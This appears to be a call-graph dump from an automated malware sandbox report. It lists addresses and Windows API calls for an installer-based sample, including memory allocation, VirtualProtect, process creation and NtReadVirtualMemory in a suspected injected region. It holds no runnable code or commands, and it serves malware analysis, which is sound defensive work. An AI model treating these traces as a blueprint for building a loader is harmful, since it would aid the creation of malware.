25639->25624 25646 406651 25640->25646 25641 4066c7 25642 4066cc CharPrevW 25641->25642 25644 4066ed 25641->25644 25642->25641 25643 4066ba CharNextW 25643->25641 25643->25646 25644->25582 25646->25641 25646->25643 25647 4066a6 CharNextW 25646->25647 25648 4066b5 CharNextW 25646->25648 25661 405cae 25646->25661 25647->25646 25648->25643 25657 40621d 25649->25657 25652 4062b2 RegQueryValueExW RegCloseKey 25653 4062e2 25652->25653 25653->25624 25654->25624 25655->25624 25656->25626 25658 40622c 25657->25658 25659 406230 25658->25659 25660 406235 RegOpenKeyExW 25658->25660 25659->25652 25659->25653 25660->25659 25662 405cb4 25661->25662 25663 405cca 25662->25663 25664 405cbb CharNextW 25662->25664 25663->25646 25664->25662 25706 4063b0 lstrcpynW 25665->25706 25667 405d9a 25707 405d2c CharNextW CharNextW 25667->25707 25670 405ade 25670->25587 25670->25588 25671 406644 5 API calls 25677 405db0 25671->25677 25672 405de1 lstrlenW 25673 405dec 25672->25673 25672->25677 25675 405c81 3 API calls 25673->25675 25674 4066f3 2 API calls 25674->25677 25676 405df1 GetFileAttributesW 25675->25676 25676->25670 25677->25670 25677->25672 25677->25674 25678 405ccd 2 API calls 25677->25678 25678->25672 25679->25591 25681 405cdb 25680->25681 25682 405ce1 CharPrevW 25681->25682 25683 405ced 25681->25683 25682->25681 25682->25683 25683->25596 25684->25608 25685->25617 25687 4054d1 25686->25687 25688 40542f 25686->25688 25687->25617 25689 40544b lstrlenW 25688->25689 25690 4063d2 17 API calls 25688->25690 25691 405474 25689->25691 25692 405459 lstrlenW 25689->25692 25690->25689 25694 405487 25691->25694 25695 40547a SetWindowTextW 25691->25695 25692->25687 25693 40546b lstrcatW 25692->25693 25693->25691 25694->25687 25696 40548d SendMessageW SendMessageW SendMessageW 25694->25696 25695->25694 25696->25687 25697->25617 25699 405c42 25698->25699 25700 406709 FindClose 25698->25700 25699->25589 25699->25601 25700->25699 25702 405c4c 25701->25702 25703 405c9d lstrcatW 25701->25703 25704 405a76 RemoveDirectoryW DeleteFileW SetFileAttributesW GetFileAttributesW SetFileAttributesW 25702->25704 25703->25702 25704->25607 25705->25621 25706->25667 25708 405d49 25707->25708 25710 405d5b 25707->25710 25708->25710 25711 405d56 CharNextW 25708->25711 25709 405d7f 25709->25670 25709->25671 25710->25709 25712 405cae CharNextW 25710->25712 25711->25709 25712->25710 25713 4015c1 25714 402c37 17 API calls 25713->25714 25715 4015c8 25714->25715 25716 405d2c 4 API calls 25715->25716 25729 4015d1 25716->25729 25717 401631 25718 401636 25717->25718 25721 401663 25717->25721 25740 401423 25718->25740 25719 405cae CharNextW 25719->25729 25723 401423 24 API calls 25721->25723 25728 40165b 25723->25728 25727 40164a SetCurrentDirectoryW 25727->25728 25729->25717 25729->25719 25730 401617 GetFileAttributesW 25729->25730 25732 40597d 25729->25732 25735 4058e3 CreateDirectoryW 25729->25735 25744 405960 CreateDirectoryW 25729->25744 25730->25729 25747 40678a GetModuleHandleA 25732->25747 25736 405930 25735->25736 25737 405934 GetLastError 25735->25737 25736->25729 25737->25736 25738 405943 SetFileSecurityW 25737->25738 25738->25736 25739 405959 GetLastError 25738->25739 25739->25736 25741 405414 24 API calls 25740->25741 25742 401431 25741->25742 25743 4063b0 lstrcpynW 25742->25743 25743->25727 25745 405974 GetLastError 25744->25745 25746 405970 25744->25746 25745->25746 25746->25729 25748 4067b0 GetProcAddress 25747->25748 25749 4067a6 25747->25749 25751 405984 25748->25751 25753 40671a GetSystemDirectoryW 25749->25753 25751->25729 25752 4067ac 25752->25748 25752->25751 25754 40673c wsprintfW LoadLibraryExW 25753->25754 25754->25752 25756 100027c2 25757 10002812 25756->25757 25758 100027d2 VirtualProtect 25756->25758 25758->25757 25759 401e43 25767 402c15 25759->25767 25761 401e49 25762 402c15 17 API calls 25761->25762 25763 401e55 25762->25763 25764 401e61 ShowWindow 25763->25764 25765 401e6c EnableWindow 25763->25765 25766 402abf 25764->25766 25765->25766 25768 4063d2 17 API calls 25767->25768 25769 402c2a 25768->25769 25769->25761 25770 402644 25771 402c15 17 API calls 25770->25771 25778 402653 25771->25778 25772 40269d ReadFile 25772->25778 25783 402790 25772->25783 25773 402736 25773->25778 25773->25783 25784 405f83 ReadFile WriteFile SetFilePointer SetFilePointer SetFilePointer 25773->25784 25776 402792 25787 4062f7 wsprintfW 25776->25787 25777 4026dd MultiByteToWideChar 25777->25778 25778->25772 25778->25773 25778->25776 25778->25777 25780 402703 SetFilePointer MultiByteToWideChar 25778->25780 25781 4027a3 25778->25781 25778->25783 25785 405f25 ReadFile 25778->25785 25780->25778 25782 4027c4 SetFilePointer 25781->25782 25781->25783 25782->25783 25784->25773 25786 405f43 25785->25786 25786->25778 25787->25783 25788 402306 25789 402314 25788->25789 25790 40230e 25788->25790 25791 402322 25789->25791 25793 402c37 17 API calls 25789->25793 25792 402c37 17 API calls 25790->25792 25794 402c37 17 API calls 25791->25794 25796 402330 25791->25796 25792->25789 25793->25791 25794->25796 25795 402c37 17 API calls 25797 402339 WritePrivateProfileStringW 25795->25797 25796->25795 25798 402348 25799 402c37 17 API calls 25798->25799 25800 402357 25799->25800 25801 402c37 17 API calls 25800->25801 25802 402360 25801->25802 25803 402c37 17 API calls 25802->25803 25804 40236a GetPrivateProfileStringW 25803->25804 25805 405388 25806 405398 25805->25806 25807 4053ac 25805->25807 25808 4053f5 25806->25808 25809 40539e 25806->25809 25810 4053b4 IsWindowVisible 25807->25810 25817 4053d4 25807->25817 25811 4053fa CallWindowProcW 25808->25811 25819 404391 25809->25819 25810->25808 25813 4053c1 25810->25813 25814 4053a8 25811->25814 25822 404cde SendMessageW GetMessagePos ScreenToClient SendMessageW SendMessageW 25813->25822 25816 4053cb 25816->25817 25817->25811 25823 404d5e MulDiv SendMessageW wsprintfW lstrcpynW 25817->25823 25820 4043a9 25819->25820 25821 40439a SendMessageW 25819->25821 25820->25814 25821->25820 25822->25816 25823->25808 25824 4027e9 25825 4027f0 25824->25825 25826 402a6a 25824->25826 25827 402c15 17 API calls 25825->25827 25828 4027f7 25827->25828 25829 402806 SetFilePointer 25828->25829 25829->25826 25830 402816 25829->25830 25832 4062f7 wsprintfW 25830->25832 25832->25826 25833 403489 SetErrorMode GetVersion 25834 4034c8 25833->25834 25835 4034ce 25833->25835 25836 40678a 5 API calls 25834->25836 25837 40671a 3 API calls 25835->25837 25836->25835 25838 4034e4 lstrlenA 25837->25838 25838->25835 25839 4034f4 25838->25839 25840 40678a 5 API calls 25839->25840 25841 4034fb 25840->25841 25842 40678a 5 API calls 25841->25842 25843 403502 25842->25843 25844 40678a 5 API calls 25843->25844 25845 40350e #17 OleInitialize SHGetFileInfoW 25844->25845 25924 4063b0 lstrcpynW 25845->25924 25848 40355a GetCommandLineW 25925 4063b0 lstrcpynW 25848->25925 25850 40356c GetModuleHandleW 25851 403584 25850->25851 25852 405cae CharNextW 25851->25852 25853 403593 CharNextW 25852->25853 25854 4036bd GetTempPathW 25853->25854 25864 4035ac 25853->25864 25926 403458 25854->25926 25856 4036d5 25857 4036d9 GetWindowsDirectoryW lstrcatW 25856->25857 25858 40372f DeleteFileW 25856->25858 25859 403458 12 API calls 25857->25859 25936 402f14 GetTickCount GetModuleFileNameW 25858->25936 25862 4036f5 25859->25862 25860 405cae CharNextW 25860->25864 25862->25858 25865 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 25862->25865 25863 403743 25866 4037f6 25863->25866 25871 4037e6 25863->25871 25875 405cae CharNextW 25863->25875 25864->25860 25869 4036a8 25864->25869 25870 4036a6 25864->25870 25868 403458 12 API calls 25865->25868 26025 4039cc 71 API calls 25866->26025 25873 403727 25868->25873 26022 4063b0 lstrcpynW 25869->26022 25870->25854 25966 403abe 25871->25966 25872 4037ff OleUninitialize 25877 403930 25872->25877 25878 403810 25872->25878 25873->25858 25873->25866 25888 403762 25875->25888 25880 4039b4 ExitProcess 25877->25880 25881 403938 GetCurrentProcess OpenProcessToken 25877->25881 26026 405a12 MessageBoxIndirectW 25878->26026 25886 403950 LookupPrivilegeValueW AdjustTokenPrivileges 25881->25886 25887 403984 25881->25887 25883 40381e ExitProcess 25884 4037c0 25889 405d89 18 API calls 25884->25889 25885 403826 25890 40597d 5 API calls 25885->25890 25886->25887 25891 40678a 5 API calls 25887->25891 25888->25884 25888->25885 25892 4037cc 25889->25892 25893 40382b lstrcatW 25890->25893 25894 40398b 25891->25894 25892->25866 26023 4063b0 lstrcpynW 25892->26023 25895 403847 lstrcatW lstrcmpiW 25893->25895 25896 40383c lstrcatW 25893->25896 25897 4039a0 ExitWindowsEx 25894->25897 25898 4039ad 25894->25898 25895->25866 25900 403863 25895->25900 25896->25895 25897->25880 25897->25898 26032 40140b 25898->26032 25903 403868 25900->25903 25904 40386f 25900->25904 25902 4037db 26024 4063b0 lstrcpynW 25902->26024 25906 4058e3 4 API calls 25903->25906 25907 405960 2 API calls 25904->25907 25909 40386d 25906->25909 25908 403874 SetCurrentDirectoryW 25907->25908 25910 403884 25908->25910 25911 40388f 25908->25911 25909->25908 26027 4063b0 lstrcpynW 25910->26027 26028 4063b0 lstrcpynW 25911->26028 25914 4063d2 17 API calls 25915 4038ce DeleteFileW 25914->25915 25916 4038db CopyFileW 25915->25916 25918 40389d 25915->25918 25916->25918 25917 403924 26031 406176 36 API calls 25917->26031 25918->25914 25918->25917 25921 4063d2 17 API calls 25918->25921 25923 40390f CloseHandle 25918->25923 26029 406176 36 API calls 25918->26029 26030 405995 CreateProcessW CloseHandle 25918->26030 25921->25918 25923->25918 25924->25848 25925->25850 25927 406644 5 API calls 25926->25927 25928 403464 25927->25928 25929 40346e 25928->25929 25930 405c81 3 API calls 25928->25930 25929->25856 25931 403476 25930->25931 25932 405960 2 API calls 25931->25932 25933 40347c 25932->25933 26035 405ed1 25933->26035 26039 405ea2 GetFileAttributesW CreateFileW 25936->26039 25938 402f57 25965 402f64 25938->25965 26040 4063b0 lstrcpynW 25938->26040 25940 402f7a 25941 405ccd 2 API calls 25940->25941 25942 402f80 25941->25942 26041 4063b0 lstrcpynW 25942->26041 25944 402f8b GetFileSize 25945 40308c 25944->25945 25963 402fa2 25944->25963 26042 402e72 25945->26042 25949 4030cf GlobalAlloc 25953 4030e6 25949->25953 25950 403127 25951 402e72 32 API calls 25950->25951 25951->25965 25955 405ed1 2 API calls 25953->25955 25954 4030b0 25956 40342b ReadFile 25954->25956 25958 4030f7 CreateFileW 25955->25958 25959 4030bb 25956->25959 25957 402e72 32 API calls 25957->25963 25960 403131 25958->25960 25958->25965 25959->25949 25959->25965 26057 403441 SetFilePointer 25960->26057 25962 40313f 26058 4031ba 25962->26058 25963->25945 25963->25950 25963->25957 25963->25965 26073 40342b 25963->26073 25965->25863 25967 40678a 5 API calls 25966->25967 25968 403ad2 25967->25968 25969 403ad8 25968->25969 25970 403aea 25968->25970 26110 4062f7 wsprintfW 25969->26110 25971 40627e 3 API calls 25970->25971 25972 403b1a 25971->25972 25974 403b39 lstrcatW 25972->25974 25976 40627e 3 API calls 25972->25976 25975 403ae8 25974->25975 26102 403d94 25975->26102 25976->25974 25979 405d89 18 API calls 25980 403b6b 25979->25980 25981 403bff 25980->25981 25983 40627e 3 API calls 25980->25983 25982 405d89 18 API calls 25981->25982 25984 403c05 25982->25984 25985 403b9d 25983->25985 25986 403c15 LoadImageW 25984->25986 25987 4063d2 17 API calls 25984->25987 25985->25981 25991 403bbe lstrlenW 25985->25991 25994 405cae CharNextW 25985->25994 25988 403cbb 25986->25988 25989 403c3c RegisterClassW 25986->25989 25987->25986 25990 40140b 2 API calls 25988->25990 25992 403c72 SystemParametersInfoW CreateWindowExW 25989->25992 26021 403cc5 25989->26021 25993 403cc1 25990->25993 25995 403bf2 25991->25995 25996 403bcc lstrcmpiW 25991->25996 25992->25988 26001 403d94 18 API calls 25993->26001 25993->26021 25998 403bbb 25994->25998 25997 405c81 3 API calls 25995->25997 25996->25995 25999 403bdc GetFileAttributesW 25996->25999 26002 403bf8 25997->26002 25998->25991 26000 403be8 25999->26000 26000->25995 26003 405ccd 2 API calls 26000->26003 26004 403cd2 26001->26004 26111 4063b0 lstrcpynW 26002->26111 26003->25995 26006 403d61 26004->26006 26007 403cde ShowWindow 26004->26007 26112 4054e7 MulDiv SendMessageW SendMessageW OleInitialize OleUninitialize 26006->26112 26009 40671a 3 API calls 26007->26009 26011 403cf6 26009->26011 26010 403d67 26012 403d83 26010->26012 26013 403d6b 26010->26013 26014 403d04 GetClassInfoW 26011->26014 26016 40671a 3 API calls 26011->26016 26015 40140b 2 API calls 26012->26015 26019 40140b 2 API calls 26013->26019 26013->26021 26017 403d18 GetClassInfoW RegisterClassW 26014->26017 26018 403d2e DialogBoxParamW 26014->26018 26015->26021 26016->26014 26017->26018 26020 40140b 2 API calls 26018->26020 26019->26021 26020->26021 26021->25866 26022->25870 26023->25902 26024->25871 26025->25872 26026->25883 26027->25911 26028->25918 26029->25918 26030->25918 26031->25866 26117 401389 26032->26117 26036 405ede GetTickCount GetTempFileNameW 26035->26036 26037 403487 26036->26037 26038 405f14 26036->26038 26037->25856 26038->26036 26038->26037 26039->25938 26040->25940 26041->25944 26043 402e83 26042->26043 26044 402e9b 26042->26044 26045 402e8c DestroyWindow 26043->26045 26048 402e93 26043->26048 26046 402ea3 26044->26046 26047 402eab GetTickCount 26044->26047 26045->26048 26077 4067c6 DispatchMessageW PeekMessageW 26046->26077 26047->26048 26050 402eb9 26047->26050 26048->25949 26048->25965 26076 403441 SetFilePointer 26048->26076 26051 402ec1 26050->26051 26052 402eee CreateDialogParamW ShowWindow 26050->26052 26051->26048 26078 402e56 MulDiv 26051->26078 26052->26048 26054 402ecf wsprintfW 26055 405414 24 API calls 26054->26055 26056 402eec 26055->26056 26056->26048 26057->25962 26059 4031e5 26058->26059 26060 4031c9 SetFilePointer 26058->26060 26079 4032c2 GetTickCount 26059->26079 26060->26059 26063 403282 26063->25965 26064 405f25 ReadFile 26065 403205 26064->26065 26065->26063 26066 4032c2 42 API calls 26065->26066 26067 40321c 26066->26067 26067->26063 26068 403288 ReadFile 26067->26068 26070 40322b 26067->26070 26068->26063 26070->26063 26071 405f25 ReadFile 26070->26071 26092 405f54 WriteFile 26070->26092 26071->26070 26074 405f25 ReadFile 26073->26074 26075 40343e 26074->26075 26075->25963 26076->25954 26077->26048 26078->26054 26080 4032f0 26079->26080 26081 40341a 26079->26081 26094 403441 SetFilePointer 26080->26094 26082 402e72 32 API calls 26081->26082 26088 4031ec 26082->26088 26084 4032fb SetFilePointer 26090 403320 26084->26090 26085 40342b ReadFile 26085->26090 26087 402e72 32 API calls 26087->26090 26088->26063 26088->26064 26089 405f54 WriteFile 26089->26090 26090->26085 26090->26087 26090->26088 26090->26089 26091 4033fb SetFilePointer 26090->26091 26095 40690b 26090->26095 26091->26081 26093 405f72 26092->26093 26093->26070 26094->26084 26096 406930 26095->26096 26097 406938 26095->26097 26096->26090 26097->26096 26098 4069c8 GlobalAlloc 26097->26098 26099 4069bf GlobalFree 26097->26099 26100 406a36 GlobalFree 26097->26100 26101 406a3f GlobalAlloc 26097->26101 26098->26096 26098->26097 26099->26098 26100->26101 26101->26096 26101->26097 26103 403da8 26102->26103 26113 4062f7 wsprintfW 26103->26113 26105 403e19 26114 403e4d 26105->26114 26107 403e1e 26108 403b49 26107->26108 26109 4063d2 17 API calls 26107->26109 26108->25979 26109->26107 26110->25975 26111->25981 26112->26010 26113->26105 26115 4063d2 17 API calls 26114->26115 26116 403e5b SetWindowTextW 26115->26116 26116->26107 26119 401390 26117->26119 26118 4013fe 26118->25880 26119->26118 26120 4013cb MulDiv SendMessageW 26119->26120 26120->26119 26121 91d7ed7 26124 91d82a0 26121->26124 26123 91d7ee2 26126 91d82c5 26124->26126 26125 91d8358 26125->26123 26126->26125 26130 91c8880 26126->26130 26131 91c88a5 26130->26131 26141 91c19d0 26131->26141 26133 91c88c9 26136 91c88d6 26133->26136 26137 91d8610 RtlFreeHeap 26133->26137 26148 91d1690 26133->26148 26165 91c86c0 26133->26165 26136->26125 26138 91d8610 26136->26138 26137->26133 26212 91d6d90 26138->26212 26140 91d8629 26140->26125 26142 91c1acf 26141->26142 26143 91c19e5 26141->26143 26142->26133 26143->26142 26144 91d1690 4 API calls 26143->26144 26145 91c1a52 26144->26145 26146 91d8610 RtlFreeHeap 26145->26146 26147 91c1a79 26145->26147 26146->26147 26147->26133 26149 91d16a4 26148->26149 26159 91d17b8 26148->26159 26149->26159 26172 91d6a80 26149->26172 26151 91d17fc 26152 91d8610 RtlFreeHeap 26151->26152 26154 91d1808 26152->26154 26153 91d19ad 26189 91d13c0 NtReadFile 26153->26189 26154->26153 26157 91d18a0 26154->26157 26154->26159 26156 91d19c0 26156->26133 26158 91d18cd 26157->26158 26157->26159 26161 91d18e5 26157->26161 26188 91d1320 RtlAllocateHeap 26158->26188 26159->26133 26161->26159 26175 91d1040 26161->26175 26162 91d18db 26162->26133 26164 91d18fd 26164->26133 26166 91c86d1 26165->26166 26206 91d6e00 26166->26206 26168 91c8718 26168->26133 26169 91c8711 26169->26168 26209 91d6c20 26169->26209 26171 91c874e 26171->26133 26173 91d6a9c NtCreateFile 26172->26173 26190 91d76b0 26172->26190 26173->26151 26176 91d108b 26175->26176 26178 91d10be 26175->26178 26176->26164 26177 91d10fc 26177->26164 26178->26177 26181 91d1131 26178->26181 26192 91d86f0 26178->26192 26182 91d1143 26181->26182 26195 91d6b30 26181->26195 26182->26164 26183 91d1197 26183->26182 26198 91d8400 26183->26198 26185 91d11ea 26186 91d8610 RtlFreeHeap 26185->26186 26187 91d11f3 26186->26187 26187->26164 26188->26162 26189->26156 26191 91d76bf 26190->26191 26191->26173 26203 91d6d50 26192->26203 26194 91d870b 26194->26181 26196 91d76b0 26195->26196 26197 91d6b4c NtReadFile 26196->26197 26197->26183 26199 91d840d 26198->26199 26200 91d8424 26198->26200 26199->26200 26201 91d86f0 RtlAllocateHeap 26199->26201 26200->26185 26202 91d843b 26201->26202 26202->26185 26204 91d76b0 26203->26204 26205 91d6d6c RtlAllocateHeap 26204->26205 26205->26194 26207 91d6e1c CreateProcessInternalW 26206->26207 26208 91d76b0 26206->26208 26207->26169 26208->26207 26210 91d76b0 26209->26210 26211 91d6c3c NtReadVirtualMemory 26210->26211 26211->26171 26213 91d76b0 26212->26213 26214 91d6dac RtlFreeHeap 26213->26214 26214->26140 26215 403e6c 26216 403e84 26215->26216 26217 403fbf 26215->26217 26216->26217 26220 403e90 26216->26220 26218 403fd0 GetDlgItem GetDlgItem 26217->26218 26219 404010 26217->26219 26223 404345 18 API calls 26218->26223 26224 40406a 26219->26224 26232 401389 2 API calls 26219->26232 26221 403e9b SetWindowPos 26220->26221 26222 403eae 26220->26222 26221->26222 26225 403eb3 ShowWindow 26222->26225 26226 403ecb 26222->26226 26227 403ffa SetClassLongW 26223->26227 26228 404391 SendMessageW 26224->26228 26249 403fba 26224->26249 26225->26226 26229 403ed3 DestroyWindow 26226->26229 26230 403eed 26226->26230 26231 40140b 2 API calls 26227->26231 26243 40407c 26228->26243 26233 4042ef 26229->26233 26234 403ef2 SetWindowLongW 26230->26234 26235 403f03 26230->26235 26231->26219 26236 404042 26232->26236 26242 4042ff ShowWindow 26233->26242 26233->26249 26234->26249 26239 403fac 26235->26239 26240 403f0f GetDlgItem 26235->26240 26236->26224 26241 404046 SendMessageW 26236->26241 26237 40140b 2 API calls 26237->26243 26238 4042d0 DestroyWindow EndDialog 26238->26233 26294 4043ac 8 API calls 26239->26294 26244 403f22 SendMessageW IsWindowEnabled 26240->26244 26245 403f3f 26240->26245 26241->26249 26242->26249 26243->26237 26243->26238 26247 4063d2 17 API calls 26243->26247 26243->26249 26259 404345 18 API calls 26243->26259 26277 404210 DestroyWindow 26243->26277 26287 404345 26243->26287 26244->26245 26244->26249 26248 403f44 26245->26248 26250 403f4c 26245->26250 26251 403f93 SendMessageW 26245->26251 26252 403f5f 26245->26252 26247->26243 26293 40431e SendMessageW 26248->26293 26250->26248 26250->26251 26251->26239 26254 403f67 26252->26254 26255 403f7c 26252->26255 26257 40140b 2 API calls 26254->26257 26258 40140b 2 API calls 26255->26258 26256 403f7a 26256->26239 26257->26248 26260 403f83 26258->26260 26259->26243 26260->26239 26260->26248 26262 4040f7 GetDlgItem 26263 404114 ShowWindow KiUserCallbackDispatcher 26262->26263 26264 40410c 26262->26264 26290 404367 EnableWindow 26263->26290 26264->26263 26266 40413e EnableWindow 26271 404152 26266->26271 26267 404157 GetSystemMenu EnableMenuItem SendMessageW 26268 404187 SendMessageW 26267->26268 26267->26271 26268->26271 26270 403e4d 18 API calls 26270->26271 26271->26267 26271->26270 26291 40437a SendMessageW 26271->26291 26292 4063b0 lstrcpynW 26271->26292 26273 4041b6 lstrlenW 26274 4063d2 17 API calls 26273->26274 26275 4041cc SetWindowTextW 26274->26275 26276 401389 2 API calls 26275->26276 26276->26243 26277->26233 26278 40422a CreateDialogParamW 26277->26278 26278->26233 26279 40425d 26278->26279 26280 404345 18 API calls 26279->26280 26281 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 26280->26281 26282 401389 2 API calls 26281->26282 26283 4042ae 26282->26283 26283->26249 26284 4042b6 ShowWindow 26283->26284 26285 404391 SendMessageW 26284->26285 26286 4042ce 26285->26286 26286->26233 26288 4063d2 17 API calls 26287->26288 26289 404350 SetDlgItemTextW 26288->26289 26289->26262 26290->26266 26291->26271 26292->26273 26293->26256 26294->26249 26295 40202c 26296 40203e 26295->26296 26306 4020f0 26295->26306 26297 402c37 17 API calls 26296->26297 26298 402045 26297->26298 26300 402c37 17 API calls 26298->26300 26299 401423 24 API calls 26304 40224a 26299->26304 26301 40204e 26300->26301 26302 402064 LoadLibraryExW 26301->26302 26303 402056 GetModuleHandleW 26301->26303 26305 402075 26302->26305 26302->26306 26303->26302 26303->26305 26318 4067f9 WideCharToMultiByte 26305->26318 26306->26299 26309 402086 26312 4020a5 26309->26312 26313 40208e 26309->26313 26310 4020bf 26311 405414 24 API calls 26310->26311 26314 402096 26311->26314 26321 10001759 26312->26321 26315 401423 24 API calls 26313->26315 26314->26304 26316 4020e2 FreeLibrary 26314->26316 26315->26314 26316->26304 26319 406823 GetProcAddress 26318->26319 26320 402080 26318->26320 26319->26320 26320->26309 26320->26310 26322 10001789 26321->26322 26363 10001b18 26322->26363 26324 10001790 26325 100018a6 26324->26325 26326 100017a1 26324->26326 26327 100017a8 26324->26327 26325->26314 26411 10002286 GlobalAlloc 26326->26411 26395 100022d0 26327->26395 26330 100017a7 26330->26327 26332 1000180c 26337 10001812 26332->26337 26338 1000184e 26332->26338 26333 100017ee 26414 100024a4 10 API calls 26333->26414 26334 100017d7 26347 100017cd 26334->26347 26413 10002b57 GlobalFree 26334->26413 26335 100017be 26336 100017c4 26335->26336 26341 100017cf 26335->26341 26336->26347 26405 1000289c 26336->26405 26417 100015b4 GlobalAlloc lstrcpyW wsprintfW 26337->26417 26419 100024a4 10 API calls 26338->26419 26340 100017f4 26415 100015b4 GlobalAlloc lstrcpyW wsprintfW 26340->26415 26412 10002640 GlobalAlloc GlobalSize 26341->26412 26347->26332 26347->26333 26349 10001828 26418 100024a4 10 API calls 26349->26418 26350 10001840 26355 10001895 26350->26355 26420 10002467 GlobalFree 26350->26420 26351 100017fa 26416 10001272 GlobalAlloc lstrcpynW 26351->26416 26352 100017d5 26352->26347 26355->26325 26358 1000189f GlobalFree 26355->26358 26357 10001800 GlobalFree 26357->26350 26358->26325 26359 10001861 26360 10001881 26359->26360 26361 1000187a FreeLibrary 26359->26361 26360->26355 26421 1000153d GlobalAlloc lstrcpynW wsprintfW 26360->26421 26361->26360 26422 1000121b GlobalAlloc 26363->26422 26365 10001b3c 26423 1000121b GlobalAlloc 26365->26423 26367 10001d7a GlobalFree GlobalFree GlobalFree 26368 10001d97 26367->26368 26384 10001de1 26367->26384 26370 10001dac 26368->26370 26371 100020ee 26368->26371 26368->26384 26369 10001b47 26369->26367 26372 10001c1d GlobalAlloc 26369->26372 26376 10001c68 lstrcpyW 26369->26376 26377 10001c86 GlobalFree 26369->26377 26379 10001c72 lstrcpyW 26369->26379 26369->26384 26386 10002048 26369->26386 26388 10001cc4 26369->26388 26389 10001f37 GlobalFree 26369->26389 26426 1000121b GlobalAlloc 26369->26426 26427 1000122c GlobalAlloc lstrcpynW 26369->26427 26370->26384 26425 1000122c GlobalAlloc lstrcpynW 26370->26425 26373 10002110 GetModuleHandleW 26371->26373 26371->26384 26372->26369 26374 10002121 LoadLibraryW 26373->26374 26375 10002136 26373->26375 26374->26375 26374->26384 26428 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 26375->26428 26376->26379 26377->26369 26379->26369 26380 10002148 26381 10002188 26380->26381 26394 10002172 GetProcAddress 26380->26394 26382 10002195 lstrlenW 26381->26382 26381->26384 26429 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 26382->26429 26384->26324 26386->26384 26391 10002090 lstrcpyW 26386->26391 26388->26369 26424 1000158f GlobalSize GlobalAlloc 26388->26424 26389->26369 26390 100021af 26390->26384 26391->26384 26394->26381 26401 100022e8 26395->26401 26397 10002410 GlobalFree 26398 100017ae 26397->26398 26397->26401 26398->26334 26398->26335 26398->26347 26399 100023ba GlobalAlloc CLSIDFromString 26399->26397 26400 1000238f GlobalAlloc WideCharToMultiByte 26400->26397 26401->26397 26401->26399 26401->26400 26402 1000122c GlobalAlloc lstrcpynW 26401->26402 26404 100023d9 26401->26404 26430 100012ba GlobalAlloc lstrcpynW 26401->26430 26402->26401 26404->26397 26431 100025d4 VirtualAlloc 26404->26431 26406 100028ae 26405->26406 26407 10002953 VirtualAlloc 26406->26407 26408 10002971 26407->26408 26409 10002a62 GetLastError 26408->26409 26410 10002a6d 26408->26410 26409->26410 26410->26347 26411->26330 26412->26352 26414->26340 26415->26351 26416->26357 26417->26349 26418->26350 26419->26350 26420->26359 26421->26355 26422->26365 26423->26369 26424->26388 26425->26384 26426->26369 26427->26369 26428->26380 26429->26390 26430->26401 26431->26404 26432 40176f 26433 402c37 17 API calls 26432->26433 26434 401776 26433->26434 26435 401796 26434->26435 26436 40179e 26434->26436 26474 4063b0 lstrcpynW 26435->26474 26475 4063b0 lstrcpynW 26436->26475 26439 40179c 26443 406644 5 API calls 26439->26443 26440 4017a9 26441 405c81 3 API calls 26440->26441 26442 4017af lstrcatW 26441->26442 26442->26439 26459 4017bb 26443->26459 26444 4066f3 2 API calls 26444->26459 26447 4017cd CompareFileTime 26447->26459 26448 40188d 26449 405414 24 API calls 26448->26449 26451 401897 26449->26451 26450 401864 26452 405414 24 API calls 26450->26452 26460 401879 26450->26460 26454 4031ba 44 API calls 26451->26454 26452->26460 26453 4063b0 lstrcpynW 26453->26459 26455 4018aa 26454->26455 26456 4018be SetFileTime 26455->26456 26458 4018d0 CloseHandle 26455->26458 26456->26458 26457 4063d2 17 API calls 26457->26459 26458->26460 26461 4018e1 26458->26461 26459->26444 26459->26447 26459->26448 26459->26450 26459->26453 26459->26457 26470 405e7d GetFileAttributesW 26459->26470 26473 405ea2 GetFileAttributesW CreateFileW 26459->26473 26476 405a12 MessageBoxIndirectW 26459->26476 26462 4018e6 26461->26462 26463 4018f9 26461->26463 26464 4063d2 17 API calls 26462->26464 26465 4063d2 17 API calls 26463->26465 26467 4018ee lstrcatW 26464->26467 26468 401901 26465->26468 26467->26468 26477 405a12 MessageBoxIndirectW 26468->26477 26471 405e9c 26470->26471 26472 405e8f SetFileAttributesW 26470->26472 26471->26459 26472->26471 26473->26459 26474->26439 26475->26440 26476->26459 26477->26460 26478 404d90 GetDlgItem GetDlgItem 26479 404de2 7 API calls 26478->26479 26487 404ffb 26478->26487 26480 404e85 DeleteObject 26479->26480 26481 404e78 SendMessageW 26479->26481 26482 404e8e 26480->26482 26481->26480 26484 404ec5 26482->26484 26485 4063d2 17 API calls 26482->26485 26483 4050df 26489 40518b 26483->26489 26495 405373 26483->26495 26500 405138 SendMessageW 26483->26500 26488 404345 18 API calls 26484->26488 26490 404ea7 SendMessageW SendMessageW 26485->26490 26486 4050c0 26486->26483 26497 4050d1 SendMessageW 26486->26497 26487->26483 26487->26486 26493 40505b 26487->26493 26494 404ed9 26488->26494 26491 405195 SendMessageW 26489->26491 26492 40519d 26489->26492 26490->26482 26491->26492 26502 4051b6 26492->26502 26503 4051af ImageList_Destroy 26492->26503 26511 4051c6 26492->26511 26535 404cde SendMessageW GetMessagePos ScreenToClient SendMessageW SendMessageW 26493->26535 26499 404345 18 API calls 26494->26499 26538 4043ac 8 API calls 26495->26538 26497->26483 26515 404ee7 26499->26515 26500->26495 26505 40514d SendMessageW 26500->26505 26501 405381 26506 4051bf GlobalFree 26502->26506 26502->26511 26503->26502 26504 405335 26504->26495 26509 405347 ShowWindow GetDlgItem ShowWindow 26504->26509 26508 405160 26505->26508 26506->26511 26507 404fbc GetWindowLongW SetWindowLongW 26510 404fd5 26507->26510 26516 405171 SendMessageW 26508->26516 26509->26495 26512 404ff3 26510->26512 26513 404fdb ShowWindow 26510->26513 26511->26504 26526 405201 26511->26526 26536 404d5e MulDiv SendMessageW wsprintfW lstrcpynW 26511->26536 26534 40437a SendMessageW 26512->26534 26533 40437a SendMessageW 26513->26533 26514 40506c 26514->26486 26515->26507 26517 404fb6 26515->26517 26521 404f37 SendMessageW 26515->26521 26522 404f73 SendMessageW 26515->26522 26523 404f84 SendMessageW 26515->26523 26516->26489 26517->26507 26517->26510 26518 405245 26527 40530b InvalidateRect 26518->26527 26530 4052a6 26518->26530 26532 4052b9 SendMessageW SendMessageW 26518->26532 26521->26515 26522->26515 